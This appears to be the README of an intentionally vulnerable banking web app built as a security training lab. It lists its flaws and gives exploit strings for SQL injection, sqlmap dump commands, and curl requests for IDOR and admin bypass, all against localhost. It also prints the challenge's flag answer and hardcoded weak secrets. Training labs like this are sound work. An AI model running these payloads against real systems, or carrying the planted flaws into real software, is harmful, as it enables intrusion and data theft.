π― Overview Razz Bank is a comprehensive training platform that demonstrates multiple categories of web application vulnerabilities in a realistic banking environment. This enhanced version includes modern UI/UX design, JWT authentication, IDOR vulnerabilities, and a comprehensive API ecosystem.
π¨ Security Vulnerabilities Included
- SQL Injection (SQLi) - Vulnerable login forms and database queries
- Insecure Direct Object Reference (IDOR) - Unauthorized access to user profiles and account data
- JWT Authentication Bypass - Weak JWT implementation with predictable secrets
- Authorization Bypass - Admin panel access through URL parameters
- Information Disclosure - Exposed user data and system information
π΄ Flag Information
- Real Flag: Located in
system_flagstable -RAZZ{y0U_H@v3_f()UNd_$QL_!NJ3CT10N} - Decoy Flags: 5+ fake flags scattered throughout the application
- Flag Format: All flags follow the pattern
RAZZ{...}
π Quick Setup & Deployment
# Clone the repository
git clone https://github.com/KerberoSec/RAZZ_BANK.git
cd RAZZ_BANK
# Development environment (SQLite)
docker-compose --profile development up -d
# Production environment (PostgreSQL + Monitoring)
docker-compose --profile production up -d
# Access the application
open http://localhost:5000# Install dependencies
pip install -r requirements.txt
# Initialize database
python3 app.py
# Access the application
open http://localhost:5000# Install system dependencies
sudo apt update
sudo apt install python3-pip docker.io docker-compose -y
# Clone and run
git clone https://github.com/KerberoSec/RAZZ_BANK.git
cd RAZZ_BANK
chmod +x setup.sh run.sh
./run.shπ Enhanced Project Structure
RAZZ_BANK/
βββ app.py # Main Flask application with JWT & IDOR
βββ requirements.txt # Python dependencies (enhanced)
βββ docker-compose.yml # Multi-service Docker setup
βββ DOCKER_SETUP.md # Docker deployment guide
βββ README.md # This documentation
β
βββ templates/ # Enhanced HTML templates
β βββ base.html # Modern responsive base template
β βββ index.html # Landing page
β βββ login.html # JWT-enabled login page
β βββ register.html # Registration page
β βββ dashboard.html # Enhanced dashboard with vulnerabilities
β βββ statements.html # Transaction statements
β βββ account_settings.html # User account management
β
βββ static/ # Frontend assets
β βββ css/
β β βββ style.css # Modern CSS with themes & animations
β βββ js/
β β βββ main.js # Enhanced JavaScript with API integration
β βββ sw.js # Service Worker for PWA
β βββ manifest.json # PWA manifest
β
βββ monitoring/ # Monitoring configuration
β βββ prometheus.yml # Metrics collection
β βββ grafana/ # Dashboard configurations
β
βββ nginx/ # Reverse proxy configuration
βββ haproxy/ # Load balancer configuration
βββ fluentd/ # Log aggregation
π Vulnerability Categories & Exploitation
- Location: Login form (
/login) - Type: Union-based SQL injection
- Impact: Authentication bypass, data exfiltration
-- Authentication bypass
Username: admin' OR '1'='1' --
Password: anything
-- Data extraction (flag retrieval)
Username: admin' UNION SELECT 1,2,3,flag_value,5,6,7,8 FROM system_flags--
Password: anything# Basic enumeration
sqlmap -u "http://localhost:5000/login" --data="username=admin&password=admin" --dbs
# Extract flag from system_flags table
sqlmap -u "http://localhost:5000/login" --data="username=admin&password=admin" -D main -T system_flags --dumpEndpoints:
/profile/<user_id>- View any user's profile data/account/<account_number>/transactions- Access any account's transactions
# Access admin profile
curl http://localhost:5000/profile/1057
# Access any account's transactions
curl http://localhost:5000/account/ADM001/transactionsIssues:
- Weak secret key:
weak_secret_key_2024 - No key rotation
- Client-side storage in localStorage
# Login with JWT
curl -X POST http://localhost:5000/api/auth/login \
-H "Content-Type: application/json" \
-d '{"username": "admin", "password": "admin123!@#"}'
# Decode JWT (weak secret allows offline cracking)
echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." | base64 -d- Location: Admin panel (
/admin/users) - Method: URL parameter manipulation
# Bypass admin authorization
curl "http://localhost:5000/admin/users?admin=true"π οΈ API Documentation
| Method | Endpoint | Description |
|---|---|---|
| POST | /api/auth/login |
JWT-based authentication |
| POST | /api/auth/verify |
JWT token verification |
| Method | Endpoint | Description | Authentication |
|---|---|---|---|
| GET | /api/status |
API status and feature list | None |
| GET | /api/transactions |
User transaction history | Session/JWT |
| POST | /api/transfer |
Money transfer between accounts | Session/JWT |
| POST | /api/pay-bill |
Bill payment processing | Session/JWT |
| POST | /api/apply-loan |
Loan application submission | Session/JWT |
| GET | /api/v1.0/account |
Account details retrieval (IDOR vulnerable) | None |
| Method | Endpoint | Vulnerability | Impact |
|---|---|---|---|
| GET | /profile/<user_id> |
IDOR | Profile data exposure |
| GET | /account/<account>/transactions |
IDOR | Transaction data exposure |
| GET | /api/v1.0/account |
IDOR | Account data exposure with flag |
| GET | /admin/users?admin=true |
AuthZ Bypass | Admin data access |
| POST | /login |
SQL Injection | Authentication bypass |
ποΈ Architecture & Technologies
- Framework: Flask 3.1.2 with enhanced security (intentionally vulnerable)
- Database: SQLite (development) / PostgreSQL (production)
- Authentication: Session-based + JWT (dual authentication)
- Caching: Redis for session management
- Security: Intentionally vulnerable implementation
- UI Framework: Modern CSS with CSS Variables and Grid/Flexbox
- JavaScript: Vanilla JS with modern ES6+ features
- PWA: Service Worker + Web App Manifest
- Responsive Design: Mobile-first approach
- Accessibility: WCAG 2.1 compliant structure
- Containerization: Docker + Docker Compose
- Reverse Proxy: Nginx with SSL termination
- Load Balancing: HAProxy for high availability
- Monitoring: Prometheus + Grafana
- Logging: Fluentd for log aggregation
π₯οΈ Enhanced Features
- Dark/Light Theme: Toggle-able theme system
- Progressive Web App: Installable on mobile devices
- Responsive Design: Optimized for all screen sizes
- Accessibility: Screen reader compatible
- Animations: Smooth transitions and micro-interactions
- Vulnerability Demonstration Panel: Interactive vulnerability testing
- API Testing Interface: Built-in API exploration tool
- Real-time Vulnerability Detection: Client-side security warnings
- Educational Context: Contextual security information
- JWT Authentication: Weak implementation for educational purposes
- Session Management: Redis-backed session storage
- Real-time Updates: WebSocket-ready architecture
- Monitoring: Comprehensive application monitoring
π³ Docker Deployment Guide
# Single container setup with SQLite
docker-compose --profile development up -d
# Access points:
# - Application: http://localhost:5001
# - Hot reload enabled for development# Full stack with PostgreSQL, Redis, monitoring
docker-compose --profile production up -d
# Access points:
# - Application: http://localhost:5000
# - Database Admin: http://localhost:8080
# - Grafana: http://localhost:3000
# - Prometheus: http://localhost:9090
# - HAProxy Stats: http://localhost:8082/stats| Service | Description | Port | Credentials |
|---|---|---|---|
| razz-bank-app | Main application | 5000 | admin/admin123!@# |
| postgres | Database server | 5432 | bank_user/secure_bank_password_2025 |
| redis | Session cache | 6379 | redis_secure_password_2025 |
| nginx | Reverse proxy | 80/443 | - |
| adminer | DB administration | 8080 | - |
| grafana | Monitoring dashboards | 3000 | admin/admin_grafana_2025 |
| prometheus | Metrics collection | 9090 | - |
π§ͺ Testing & Validation
# API endpoint testing
curl -s http://localhost:5000/api/status | jq
# Health checks
curl -s http://localhost:5000/health
# Vulnerability validation
curl -s "http://localhost:5000/admin/users?admin=true" | jq- SQL injection in login form
- IDOR vulnerability in profile access
- JWT authentication flow
- Admin authorization bypass
- API endpoint accessibility
- PWA installation
- Responsive design on mobile
- Theme switching functionality
π Educational Learning Paths
- Reconnaissance - Explore
/robots.txt,/sitemap.xml - SQL Injection - Basic authentication bypass
- Flag Hunting - Distinguish real vs. fake flags
- Documentation Review - Understand application structure
- Advanced SQLi - Union-based data extraction
- IDOR Exploitation - Unauthorized data access
- API Security - JWT token analysis
- Authorization Testing - Admin panel bypass
- Full Chain Exploitation - Combine multiple vulnerabilities
- Custom Payload Development - Create sophisticated attacks
- Defense Evasion - Bypass security controls
- Report Writing - Document findings professionally
π§ Configuration & Customization
# Database configuration
DATABASE_URL=sqlite:///razz_bank.db # or postgresql://...
REDIS_URL=redis://localhost:6379
# Application settings
FLASK_ENV=production
FLASK_DEBUG=false
# JWT configuration
JWT_SECRET=weak_secret_key_2024 # Intentionally weak
JWT_ALGORITHM=HS256- Database Backend: Switch between SQLite and PostgreSQL
- Authentication Method: Session-based vs JWT
- Theme System: Customize colors and styling
- Vulnerability Levels: Enable/disable specific vulnerabilities
π¨ Security Warnings
- Never deploy in production - This application is intentionally vulnerable
- Educational use only - For authorized security training purposes
- Isolated environment - Deploy only in sandboxed/isolated networks
- Legal compliance - Ensure proper authorization before testing
- Data protection - Do not use real personal or financial data
The application demonstrates the following security anti-patterns:
- Unparameterized queries β Use prepared statements
- Missing authorization checks β Implement proper access controls
- Weak cryptographic practices β Use strong, rotated secrets
- Information disclosure β Minimize error message details
- Insufficient input validation β Implement comprehensive validation
π Challenge Completion
β
Primary Objective: Extract the real flag from system_flags table
β
Secondary Objectives:
- Demonstrate IDOR vulnerability
- Exploit JWT authentication
- Bypass admin authorization
- Document all findings
- Real Flag:
RAZZ{y0U_H@v3_f()UNd_$QL_!NJ3CT10N} - Location:
system_flagstable βflag_valuecolumn - Method: SQL injection via login form
π Support & Resources
- Port conflicts: Use
docker-compose downand check port availability - Database issues: Reset with
rm razz_bank.dband restart - Permission errors: Check file permissions with
chmod +x setup.sh run.sh
- Report Issues: GitHub Issues for bug reports
- Contributions: Pull requests for improvements
- Discussions: GitHub Discussions for questions
π License & Legal This project is released under the MIT License for educational purposes.
Legal Notice: This software is designed for educational and authorized security testing purposes only. Users are responsible for ensuring compliance with applicable laws and regulations. The authors assume no liability for misuse of this software.
π Created for Security Education by Razz Security Use responsibly - Learn ethically - Secure the digital world